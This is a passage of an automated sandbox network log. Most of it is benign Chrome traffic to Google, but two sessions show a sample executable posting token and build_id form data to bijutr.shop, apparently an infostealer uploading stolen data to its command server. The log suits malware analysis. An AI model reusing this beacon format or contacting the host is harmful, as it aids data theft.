                                                                                                                                                                                                                                                                        2024-12-27 07:20:20 UTC1390INData Raw: 4f 54 63 30 59 58 6c 4a 61 32 46 4a 61 55 6c 78 62 32 64 7a 63 58 46 4d 51 6c 4a 68 4d 6a 4e 30 64 47 70 72 59 31 5a 70 53 6e 56 49 63 33 68 76 4d 47 46 4b 59 58 46 7a 63 45 74 70 53 32 31 71 64 55 45 77 63 32 70 53 64 48 4e 76 4e 32 73 72 54 55 46 47 62 58 56 77 53 55 39 4a 57 6d 68 4b 56 6e 64 77 63 48 70 32 54 48 6b 32 63 7a 52 43 56 57 5a 4b 61 47 4a 75 65 47 56 33 64 6a 42 32 61 47 31 4c 55 58 64 43 52 6a 64 49 4d 30 5a 7a 56 54 42 7a 53 56 4e 73 61 46 4e 53 52 6a 46 78 61 55 4a 79 5a 30 68 6b 55 55 78 6d 5a 7a 52 31 57 6d 78 53 55 33 70 7a 52 6c 5a 53 5a 47 31 4b 63 30 46 51 59 7a 52 6e 4f 58 68 4e 56 45 56 33 52 58 68 59 52 6b 4e 46 5a 56 4e 52 4e 33 6c 54 56 7a 46 49 64 30 39 6e 53 47 64 69 4c 32 4e 72 4f 54 68 58 57 54 46 78 4e 6e 46 6c 62 47 64
                                                                                                                                                                                                                                                                        Data Ascii: OTc0YXlJa2FJaUlxb2dzcXFMQlJhMjN0dGprY1ZpSnVIc3hvMGFKYXFzcEtpS21qdUEwc2pSdHNvN2srTUFGbXVwSU9JWmhKVndwcHp2THk2czRCVWZKaGJueGV3djB2aG1LUXdCRjdIM0ZzVTBzSVNsaFNSRjFxaUJyZ0hkUUxmZzR1WmxSU3pzRlZSZG1Kc0FQYzRnOXhNVEV3RXhYRkNFZVNRN3lTVzFId09nSGdiL2NrOThXWTFxNnFlbGd
                                                                                                                                                                                                                                                                        2024-12-27 07:20:20 UTC237INData Raw: 2c 31 32 35 33 2c 31 32 35 32 2c 31 32 35 31 2c 31 32 35 30 5d 2c 22 67 6f 6f 67 6c 65 3a 73 75 67 67 65 73 74 73 75 62 74 79 70 65 73 22 3a 5b 5b 33 2c 31 34 33 2c 33 36 32 5d 2c 5b 33 2c 31 34 33 2c 33 36 32 5d 2c 5b 33 2c 31 34 33 2c 33 36 32 5d 2c 5b 33 2c 31 34 33 2c 33 36 32 5d 2c 5b 33 2c 31 34 33 2c 33 36 32 5d 2c 5b 33 2c 31 34 33 2c 33 36 32 5d 2c 5b 33 2c 31 34 33 2c 33 36 32 5d 2c 5b 33 2c 31 34 33 2c 33 36 32 5d 5d 2c 22 67 6f 6f 67 6c 65 3a 73 75 67 67 65 73 74 74 79 70 65 22 3a 5b 22 45 4e 54 49 54 59 22 2c 22 51 55 45 52 59 22 2c 22 51 55 45 52 59 22 2c 22 51 55 45 52 59 22 2c 22 51 55 45 52 59 22 2c 22 51 55 45 52 59 22 2c 22 51 55 45 52 59 22 2c 22 45 4e 54 49 54 59 22 5d 7d 5d 0d 0a
                                                                                                                                                                                                                                                                        Data Ascii: ,1253,1252,1251,1250],"google:suggestsubtypes":[[3,143,362],[3,143,362],[3,143,362],[3,143,362],[3,143,362],[3,143,362],[3,143,362],[3,143,362]],"google:suggesttype":["ENTITY","QUERY","QUERY","QUERY","QUERY","QUERY","QUERY","ENTITY"]}]
                                                                                                                                                                                                                                                                        2024-12-27 07:20:20 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                        Data Ascii: 0


                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                        9192.168.2.549734172.217.21.364435232C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                        2024-12-27 07:20:20 UTC518OUTGET /async/newtab_ogb?hl=en-US&async=fixed:0 HTTP/1.1
                                                                                                                                                                                                                                                                        Host: www.google.com
                                                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                                                        X-Client-Data: CIe2yQEIprbJAQipncoBCMDdygEIk6HLAQiFoM0BCNy9zQEI2sPNAQjpxc0BCLnKzQEIv9HNAQiK080BCNDWzQEIqNjNAQj5wNQVGI/OzQEYutLNARjC2M0BGOuNpRc=
                                                                                                                                                                                                                                                                        Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                                                        Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                                        Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                        2024-12-27 07:20:20 UTC1018INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                        Version: 705503573
                                                                                                                                                                                                                                                                        Content-Type: application/json; charset=UTF-8
                                                                                                                                                                                                                                                                        X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                        Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                                                                                                        Cross-Origin-Opener-Policy: same-origin-allow-popups; report-to="gws"
                                                                                                                                                                                                                                                                        Report-To: {"group":"gws","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/gws/none"}]}
                                                                                                                                                                                                                                                                        Accept-CH: Sec-CH-Prefers-Color-Scheme
                                                                                                                                                                                                                                                                        Accept-CH: Sec-CH-UA-Form-Factors
                                                                                                                                                                                                                                                                        Accept-CH: Sec-CH-UA-Platform
                                                                                                                                                                                                                                                                        Accept-CH: Sec-CH-UA-Platform-Version
                                                                                                                                                                                                                                                                        Accept-CH: Sec-CH-UA-Full-Version
                                                                                                                                                                                                                                                                        Accept-CH: Sec-CH-UA-Arch
                                                                                                                                                                                                                                                                        Accept-CH: Sec-CH-UA-Model
                                                                                                                                                                                                                                                                        Accept-CH: Sec-CH-UA-Bitness
                                                                                                                                                                                                                                                                        Accept-CH: Sec-CH-UA-Full-Version-List
                                                                                                                                                                                                                                                                        Accept-CH: Sec-CH-UA-WoW64
                                                                                                                                                                                                                                                                        Permissions-Policy: unload=()
                                                                                                                                                                                                                                                                        Content-Disposition: attachment; filename="f.txt"
                                                                                                                                                                                                                                                                        Date: Fri, 27 Dec 2024 07:20:20 GMT
                                                                                                                                                                                                                                                                        Server: gws
                                                                                                                                                                                                                                                                        X-XSS-Protection: 0
                                                                                                                                                                                                                                                                        X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                                                                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                                                                                                        Accept-Ranges: none
                                                                                                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                        2024-12-27 07:20:20 UTC372INData Raw: 31 37 38 64 0d 0a 29 5d 7d 27 0a 7b 22 75 70 64 61 74 65 22 3a 7b 22 6c 61 6e 67 75 61 67 65 5f 63 6f 64 65 22 3a 22 65 6e 2d 55 53 22 2c 22 6f 67 62 22 3a 7b 22 68 74 6d 6c 22 3a 7b 22 70 72 69 76 61 74 65 5f 64 6f 5f 6e 6f 74 5f 61 63 63 65 73 73 5f 6f 72 5f 65 6c 73 65 5f 73 61 66 65 5f 68 74 6d 6c 5f 77 72 61 70 70 65 64 5f 76 61 6c 75 65 22 3a 22 5c 75 30 30 33 63 68 65 61 64 65 72 20 63 6c 61 73 73 5c 75 30 30 33 64 5c 22 67 62 5f 45 61 20 67 62 5f 32 64 20 67 62 5f 51 65 20 67 62 5f 71 64 5c 22 20 69 64 5c 75 30 30 33 64 5c 22 67 62 5c 22 20 72 6f 6c 65 5c 75 30 30 33 64 5c 22 62 61 6e 6e 65 72 5c 22 20 73 74 79 6c 65 5c 75 30 30 33 64 5c 22 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 74 72 61 6e 73 70 61 72 65 6e 74 5c 22 5c 75 30 30 33 65
                                                                                                                                                                                                                                                                        Data Ascii: 178d)]}'{"update":{"language_code":"en-US","ogb":{"html":{"private_do_not_access_or_else_safe_html_wrapped_value":"\u003cheader class\u003d\"gb_Ea gb_2d gb_Qe gb_qd\" id\u003d\"gb\" role\u003d\"banner\" style\u003d\"background-color:transparent\"\u003e
                                                                                                                                                                                                                                                                        2024-12-27 07:20:20 UTC1390INData Raw: 63 6c 61 73 73 5c 75 30 30 33 64 5c 22 67 62 5f 77 64 20 67 62 5f 72 64 5c 22 5c 75 30 30 33 65 5c 75 30 30 33 63 64 69 76 20 63 6c 61 73 73 5c 75 30 30 33 64 5c 22 67 62 5f 4a 63 20 67 62 5f 51 5c 22 20 61 72 69 61 2d 65 78 70 61 6e 64 65 64 5c 75 30 30 33 64 5c 22 66 61 6c 73 65 5c 22 20 61 72 69 61 2d 6c 61 62 65 6c 5c 75 30 30 33 64 5c 22 4d 61 69 6e 20 6d 65 6e 75 5c 22 20 72 6f 6c 65 5c 75 30 30 33 64 5c 22 62 75 74 74 6f 6e 5c 22 20 74 61 62 69 6e 64 65 78 5c 75 30 30 33 64 5c 22 30 5c 22 5c 75 30 30 33 65 5c 75 30 30 33 63 73 76 67 20 66 6f 63 75 73 61 62 6c 65 5c 75 30 30 33 64 5c 22 66 61 6c 73 65 5c 22 20 76 69 65 77 62 6f 78 5c 75 30 30 33 64 5c 22 30 20 30 20 32 34 20 32 34 5c 22 5c 75 30 30 33 65 5c 75 30 30 33 63 70 61 74 68 20 64 5c 75 30
                                                                                                                                                                                                                                                                        Data Ascii: class\u003d\"gb_wd gb_rd\"\u003e\u003cdiv class\u003d\"gb_Jc gb_Q\" aria-expanded\u003d\"false\" aria-label\u003d\"Main menu\" role\u003d\"button\" tabindex\u003d\"0\"\u003e\u003csvg focusable\u003d\"false\" viewbox\u003d\"0 0 24 24\"\u003e\u003cpath d\u0
                                                                                                                                                                                                                                                                        2024-12-27 07:20:20 UTC1390INData Raw: 30 30 33 63 64 69 76 20 63 6c 61 73 73 5c 75 30 30 33 64 5c 22 67 62 5f 77 64 20 67 62 5f 38 63 20 67 62 5f 39 63 5c 22 5c 75 30 30 33 65 5c 75 30 30 33 63 73 70 61 6e 20 63 6c 61 73 73 5c 75 30 30 33 64 5c 22 67 62 5f 75 64 5c 22 20 61 72 69 61 2d 6c 65 76 65 6c 5c 75 30 30 33 64 5c 22 31 5c 22 20 72 6f 6c 65 5c 75 30 30 33 64 5c 22 68 65 61 64 69 6e 67 5c 22 5c 75 30 30 33 65 20 5c 75 30 30 33 63 5c 2f 73 70 61 6e 5c 75 30 30 33 65 5c 75 30 30 33 63 64 69 76 20 63 6c 61 73 73 5c 75 30 30 33 64 5c 22 67 62 5f 61 64 5c 22 5c 75 30 30 33 65 20 5c 75 30 30 33 63 5c 2f 64 69 76 5c 75 30 30 33 65 5c 75 30 30 33 63 5c 2f 64 69 76 5c 75 30 30 33 65 5c 75 30 30 33 63 5c 2f 64 69 76 5c 75 30 30 33 65 5c 75 30 30 33 63 64 69 76 20 63 6c 61 73 73 5c 75 30 30 33 64
                                                                                                                                                                                                                                                                        Data Ascii: 003cdiv class\u003d\"gb_wd gb_8c gb_9c\"\u003e\u003cspan class\u003d\"gb_ud\" aria-level\u003d\"1\" role\u003d\"heading\"\u003e \u003c\/span\u003e\u003cdiv class\u003d\"gb_ad\"\u003e \u003c\/div\u003e\u003c\/div\u003e\u003c\/div\u003e\u003cdiv class\u003d
                                                                                                                                                                                                                                                                        2024-12-27 07:20:20 UTC1390INData Raw: 73 73 5c 75 30 30 33 64 5c 22 67 62 5f 44 5c 22 20 66 6f 63 75 73 61 62 6c 65 5c 75 30 30 33 64 5c 22 66 61 6c 73 65 5c 22 20 68 65 69 67 68 74 5c 75 30 30 33 64 5c 22 32 34 70 78 5c 22 20 76 69 65 77 42 6f 78 5c 75 30 30 33 64 5c 22 30 20 2d 39 36 30 20 39 36 30 20 39 36 30 5c 22 20 77 69 64 74 68 5c 75 30 30 33 64 5c 22 32 34 70 78 5c 22 5c 75 30 30 33 65 20 5c 75 30 30 33 63 70 61 74 68 20 64 5c 75 30 30 33 64 5c 22 4d 32 30 39 2d 31 32 30 71 2d 34 32 20 30 2d 37 30 2e 35 2d 32 38 2e 35 54 31 31 30 2d 32 31 37 71 30 2d 31 34 20 33 2d 32 35 2e 35 74 39 2d 32 31 2e 35 6c 32 32 38 2d 33 34 31 71 31 30 2d 31 34 20 31 35 2d 33 31 74 35 2d 33 34 76 2d 31 31 30 68 2d 32 30 71 2d 31 33 20 30 2d 32 31 2e 35 2d 38 2e 35 54 33 32 30 2d 38 31 30 71 30 2d 31 33 20
                                                                                                                                                                                                                                                                        Data Ascii: ss\u003d\"gb_D\" focusable\u003d\"false\" height\u003d\"24px\" viewBox\u003d\"0 -960 960 960\" width\u003d\"24px\"\u003e \u003cpath d\u003d\"M209-120q-42 0-70.5-28.5T110-217q0-14 3-25.5t9-21.5l228-341q10-14 15-31t5-34v-110h-20q-13 0-21.5-8.5T320-810q0-13
                                                                                                                                                                                                                                                                        2024-12-27 07:20:20 UTC1390INData Raw: 31 2c 30 20 32 2c 2d 30 2e 39 20 32 2c 2d 32 73 2d 30 2e 39 2c 2d 32 20 2d 32 2c 2d 32 20 2d 32 2c 30 2e 39 20 2d 32 2c 32 20 30 2e 39 2c 32 20 32 2c 32 7a 4d 31 36 2c 36 63 30 2c 31 2e 31 20 30 2e 39 2c 32 20 32 2c 32 73 32 2c 2d 30 2e 39 20 32 2c 2d 32 20 2d 30 2e 39 2c 2d 32 20 2d 32 2c 2d 32 20 2d 32 2c 30 2e 39 20 2d 32 2c 32 7a 4d 31 32 2c 38 63 31 2e 31 2c 30 20 32 2c 2d 30 2e 39 20 32 2c 2d 32 73 2d 30 2e 39 2c 2d 32 20 2d 32 2c 2d 32 20 2d 32 2c 30 2e 39 20 2d 32 2c 32 20 30 2e 39 2c 32 20 32 2c 32 7a 4d 31 38 2c 31 34 63 31 2e 31 2c 30 20 32 2c 2d 30 2e 39 20 32 2c 2d 32 73 2d 30 2e 39 2c 2d 32 20 2d 32 2c 2d 32 20 2d 32 2c 30 2e 39 20 2d 32 2c 32 20 30 2e 39 2c 32 20 32 2c 32 7a 4d 31 38 2c 32 30 63 31 2e 31 2c 30 20 32 2c 2d 30 2e 39 20 32 2c
                                                                                                                                                                                                                                                                        Data Ascii: 1,0 2,-0.9 2,-2s-0.9,-2 -2,-2 -2,0.9 -2,2 0.9,2 2,2zM16,6c0,1.1 0.9,2 2,2s2,-0.9 2,-2 -0.9,-2 -2,-2 -2,0.9 -2,2zM12,8c1.1,0 2,-0.9 2,-2s-0.9,-2 -2,-2 -2,0.9 -2,2 0.9,2 2,2zM18,14c1.1,0 2,-0.9 2,-2s-0.9,-2 -2,-2 -2,0.9 -2,2 0.9,2 2,2zM18,20c1.1,0 2,-0.9 2,
                                                                                                                                                                                                                                                                        2024-12-27 07:20:20 UTC105INData Raw: 65 6e 75 2d 63 6f 6e 74 65 6e 74 22 2c 22 6d 65 74 61 64 61 74 61 22 3a 7b 22 62 61 72 5f 68 65 69 67 68 74 22 3a 36 30 2c 22 65 78 70 65 72 69 6d 65 6e 74 5f 69 64 22 3a 5b 33 37 30 30 33 30 30 2c 33 37 30 30 39 34 39 2c 33 37 30 31 33 38 34 2c 31 30 32 32 37 38 32 30 35 5d 2c 22 69 73 5f 62 61 63 6b 75 70 0d 0a
                                                                                                                                                                                                                                                                        Data Ascii: enu-content","metadata":{"bar_height":60,"experiment_id":[3700300,3700949,3701384,102278205],"is_backup
                                                                                                                                                                                                                                                                        2024-12-27 07:20:21 UTC274INData Raw: 31 30 62 0d 0a 5f 62 61 72 22 3a 66 61 6c 73 65 7d 2c 22 70 61 67 65 5f 68 6f 6f 6b 73 22 3a 7b 22 61 66 74 65 72 5f 62 61 72 5f 73 63 72 69 70 74 22 3a 7b 22 70 72 69 76 61 74 65 5f 64 6f 5f 6e 6f 74 5f 61 63 63 65 73 73 5f 6f 72 5f 65 6c 73 65 5f 73 61 66 65 5f 73 63 72 69 70 74 5f 77 72 61 70 70 65 64 5f 76 61 6c 75 65 22 3a 22 74 68 69 73 2e 67 62 61 72 5f 5c 75 30 30 33 64 74 68 69 73 2e 67 62 61 72 5f 7c 7c 7b 7d 3b 28 66 75 6e 63 74 69 6f 6e 28 5f 29 7b 76 61 72 20 77 69 6e 64 6f 77 5c 75 30 30 33 64 74 68 69 73 3b 5c 6e 74 72 79 7b 5c 6e 5f 2e 78 64 5c 75 30 30 33 64 66 75 6e 63 74 69 6f 6e 28 61 2c 62 2c 63 29 7b 69 66 28 21 61 2e 6a 29 69 66 28 63 20 69 6e 73 74 61 6e 63 65 6f 66 20 41 72 72 61 79 29 66 6f 72 28 76 61 72 20 64 20 6f 66 20 63 29
                                                                                                                                                                                                                                                                        Data Ascii: 10b_bar":false},"page_hooks":{"after_bar_script":{"private_do_not_access_or_else_safe_script_wrapped_value":"this.gbar_\u003dthis.gbar_||{};(function(_){var window\u003dthis;\ntry{\n_.xd\u003dfunction(a,b,c){if(!a.j)if(c instanceof Array)for(var d of c)
                                                                                                                                                                                                                                                                        2024-12-27 07:20:21 UTC1390INData Raw: 38 30 30 30 0d 0a 64 5c 75 30 30 33 64 28 30 2c 5f 2e 7a 29 28 61 2e 43 2c 61 2c 62 29 3b 63 6f 6e 73 74 20 65 5c 75 30 30 33 64 61 2e 76 2b 63 3b 61 2e 76 2b 2b 3b 62 2e 64 61 74 61 73 65 74 2e 65 71 69 64 5c 75 30 30 33 64 65 3b 61 2e 42 5b 65 5d 5c 75 30 30 33 64 64 3b 62 5c 75 30 30 32 36 5c 75 30 30 32 36 62 2e 61 64 64 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 3f 62 2e 61 64 64 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 28 63 2c 64 2c 21 31 29 3a 62 5c 75 30 30 32 36 5c 75 30 30 32 36 62 2e 61 74 74 61 63 68 45 76 65 6e 74 3f 62 2e 61 74 74 61 63 68 45 76 65 6e 74 28 5c 22 6f 6e 5c 22 2b 63 2c 64 29 3a 61 2e 6f 2e 6c 6f 67 28 45 72 72 6f 72 28 5c 22 42 60 5c 22 2b 62 29 29 7d 7d 3b 5c 6e 7d 63 61 74 63 68 28 65 29 7b 5f 2e 5f 44 75 6d 70 45 78 63 65 70 74
                                                                                                                                                                                                                                                                        Data Ascii: 8000d\u003d(0,_.z)(a.C,a,b);const e\u003da.v+c;a.v++;b.dataset.eqid\u003de;a.B[e]\u003dd;b\u0026\u0026b.addEventListener?b.addEventListener(c,d,!1):b\u0026\u0026b.attachEvent?b.attachEvent(\"on\"+c,d):a.o.log(Error(\"B`\"+b))}};\n}catch(e){_._DumpExcept
                                                                                                                                                                                                                                                                        2024-12-27 07:20:21 UTC1390INData Raw: 63 6f 6e 73 74 72 75 63 74 6f 72 28 61 29 7b 74 68 69 73 2e 6e 68 5c 75 30 30 33 64 61 7d 7d 3b 5f 2e 4b 64 5c 75 30 30 33 64 5b 47 64 28 5c 22 64 61 74 61 5c 22 29 2c 47 64 28 5c 22 68 74 74 70 5c 22 29 2c 47 64 28 5c 22 68 74 74 70 73 5c 22 29 2c 47 64 28 5c 22 6d 61 69 6c 74 6f 5c 22 29 2c 47 64 28 5c 22 66 74 70 5c 22 29 2c 6e 65 77 20 5f 2e 46 64 28 61 5c 75 30 30 33 64 5c 75 30 30 33 65 2f 5e 5b 5e 3a 5d 2a 28 5b 2f 3f 23 5d 7c 24 29 2f 2e 74 65 73 74 28 61 29 29 5d 3b 5f 2e 4c 64 5c 75 30 30 33 64 63 6c 61 73 73 7b 63 6f 6e 73 74 72 75 63 74 6f 72 28 61 29 7b 74 68 69 73 2e 69 5c 75 30 30 33 64 61 7d 74 6f 53 74 72 69 6e 67 28 29 7b 72 65 74 75 72 6e 20 74 68 69 73 2e 69 2b 5c 22 5c 22 7d 7d 3b 5f 2e 4d 64 5c 75 30 30 33 64 6e 65 77 20 5f 2e 4c 64
                                                                                                                                                                                                                                                                        Data Ascii: constructor(a){this.nh\u003da}};_.Kd\u003d[Gd(\"data\"),Gd(\"http\"),Gd(\"https\"),Gd(\"mailto\"),Gd(\"ftp\"),new _.Fd(a\u003d\u003e/^[^:]*([/?#]|$)/.test(a))];_.Ld\u003dclass{constructor(a){this.i\u003da}toString(){return this.i+\"\"}};_.Md\u003dnew _.Ld
                                                                                                                                                                                                                                                                        2024-12-27 07:20:21 UTC1390INData Raw: 3b 72 65 74 75 72 6e 20 62 5c 75 30 30 33 64 5c 75 30 30 33 64 6e 75 6c 6c 3f 5c 22 5c 22 3a 62 2e 6e 6f 6e 63 65 7c 7c 62 2e 67 65 74 41 74 74 72 69 62 75 74 65 28 5c 22 6e 6f 6e 63 65 5c 22 29 7c 7c 5c 22 5c 22 7d 3b 5c 6e 5f 2e 24 64 5c 75 30 30 33 64 66 75 6e 63 74 69 6f 6e 28 61 29 7b 76 61 72 20 62 5c 75 30 30 33 64 5f 2e 4d 61 28 61 29 3b 72 65 74 75 72 6e 20 62 5c 75 30 30 33 64 5c 75 30 30 33 64 5c 22 61 72 72 61 79 5c 22 7c 7c 62 5c 75 30 30 33 64 5c 75 30 30 33 64 5c 22 6f 62 6a 65 63 74 5c 22 5c 75 30 30 32 36 5c 75 30 30 32 36 74 79 70 65 6f 66 20 61 2e 6c 65 6e 67 74 68 5c 75 30 30 33 64 5c 75 30 30 33 64 5c 22 6e 75 6d 62 65 72 5c 22 7d 3b 5f 2e 61 65 5c 75 30 30 33 64 66 75 6e 63 74 69 6f 6e 28 61 2c 62 2c 63 29 7b 72 65 74 75 72 6e 20 5f
                                                                                                                                                                                                                                                                        Data Ascii: ;return b\u003d\u003dnull?\"\":b.nonce||b.getAttribute(\"nonce\")||\"\"};\n_.$d\u003dfunction(a){var b\u003d_.Ma(a);return b\u003d\u003d\"array\"||b\u003d\u003d\"object\"\u0026\u0026typeof a.length\u003d\u003d\"number\"};_.ae\u003dfunction(a,b,c){return _


                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                        10192.168.2.549735172.217.21.364435232C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                        2024-12-27 07:20:20 UTC353OUTGET /async/newtab_promos HTTP/1.1
                                                                                                                                                                                                                                                                        Host: www.google.com
                                                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                                                        Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                                                        Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                                        Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                        2024-12-27 07:20:20 UTC933INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                        Version: 705503573
                                                                                                                                                                                                                                                                        Content-Type: application/json; charset=UTF-8
                                                                                                                                                                                                                                                                        X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                        Cross-Origin-Opener-Policy: same-origin-allow-popups; report-to="gws"
                                                                                                                                                                                                                                                                        Report-To: {"group":"gws","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/gws/none"}]}
                                                                                                                                                                                                                                                                        Accept-CH: Sec-CH-UA-Form-Factors
                                                                                                                                                                                                                                                                        Accept-CH: Sec-CH-UA-Platform
                                                                                                                                                                                                                                                                        Accept-CH: Sec-CH-UA-Platform-Version
                                                                                                                                                                                                                                                                        Accept-CH: Sec-CH-UA-Full-Version
                                                                                                                                                                                                                                                                        Accept-CH: Sec-CH-UA-Arch
                                                                                                                                                                                                                                                                        Accept-CH: Sec-CH-UA-Model
                                                                                                                                                                                                                                                                        Accept-CH: Sec-CH-UA-Bitness
                                                                                                                                                                                                                                                                        Accept-CH: Sec-CH-UA-Full-Version-List
                                                                                                                                                                                                                                                                        Accept-CH: Sec-CH-UA-WoW64
                                                                                                                                                                                                                                                                        Permissions-Policy: unload=()
                                                                                                                                                                                                                                                                        Content-Disposition: attachment; filename="f.txt"
                                                                                                                                                                                                                                                                        Date: Fri, 27 Dec 2024 07:20:20 GMT
                                                                                                                                                                                                                                                                        Server: gws
                                                                                                                                                                                                                                                                        X-XSS-Protection: 0
                                                                                                                                                                                                                                                                        X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                                                                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                                                                                                        Accept-Ranges: none
                                                                                                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                        2024-12-27 07:20:20 UTC35INData Raw: 31 64 0d 0a 29 5d 7d 27 0a 7b 22 75 70 64 61 74 65 22 3a 7b 22 70 72 6f 6d 6f 73 22 3a 7b 7d 7d 7d 0d 0a
                                                                                                                                                                                                                                                                        Data Ascii: 1d)]}'{"update":{"promos":{}}}
                                                                                                                                                                                                                                                                        2024-12-27 07:20:20 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                        Data Ascii: 0


                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                        11192.168.2.549758188.245.216.2054436584C:\Users\user\Desktop\aD7D9fkpII.exe
                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                        2024-12-27 07:20:24 UTC323OUTPOST / HTTP/1.1
                                                                                                                                                                                                                                                                        Content-Type: multipart/form-data; boundary=----LNOZ5XL6XLN7YUAS2VAS
                                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0
                                                                                                                                                                                                                                                                        Host: bijutr.shop
                                                                                                                                                                                                                                                                        Content-Length: 505
                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                                                        2024-12-27 07:20:24 UTC505OUTData Raw: 2d 2d 2d 2d 2d 2d 4c 4e 4f 5a 35 58 4c 36 58 4c 4e 37 59 55 41 53 32 56 41 53 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 34 36 32 35 31 64 39 64 32 33 33 66 63 36 63 36 34 64 31 64 65 32 33 65 35 65 61 32 64 64 35 61 0d 0a 2d 2d 2d 2d 2d 2d 4c 4e 4f 5a 35 58 4c 36 58 4c 4e 37 59 55 41 53 32 56 41 53 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 39 66 33 33 66 34 66 31 33 36 61 39 35 36 31 39 61 32 36 32 32 31 64 33 34 61 36 35 35 35 34 30 0d 0a 2d 2d 2d 2d 2d 2d 4c 4e 4f 5a 35 58 4c 36 58 4c 4e 37 59 55 41 53 32 56 41 53 0d 0a 43 6f 6e 74
                                                                                                                                                                                                                                                                        Data Ascii: ------LNOZ5XL6XLN7YUAS2VASContent-Disposition: form-data; name="token"46251d9d233fc6c64d1de23e5ea2dd5a------LNOZ5XL6XLN7YUAS2VASContent-Disposition: form-data; name="build_id"9f33f4f136a95619a26221d34a655540------LNOZ5XL6XLN7YUAS2VASCont
                                                                                                                                                                                                                                                                        2024-12-27 07:20:25 UTC158INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                        Server: nginx
                                                                                                                                                                                                                                                                        Date: Fri, 27 Dec 2024 07:20:25 GMT
                                                                                                                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                        2024-12-27 07:20:25 UTC12INData Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                        Data Ascii: 2ok0


                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                        12192.168.2.549761188.245.216.2054436584C:\Users\user\Desktop\aD7D9fkpII.exe
                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                        2024-12-27 07:20:25 UTC326OUTPOST / HTTP/1.1
                                                                                                                                                                                                                                                                        Content-Type: multipart/form-data; boundary=----CBASRIWLNYCBIEUAAI5F
                                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0
                                                                                                                                                                                                                                                                        Host: bijutr.shop
                                                                                                                                                                                                                                                                        Content-Length: 213453
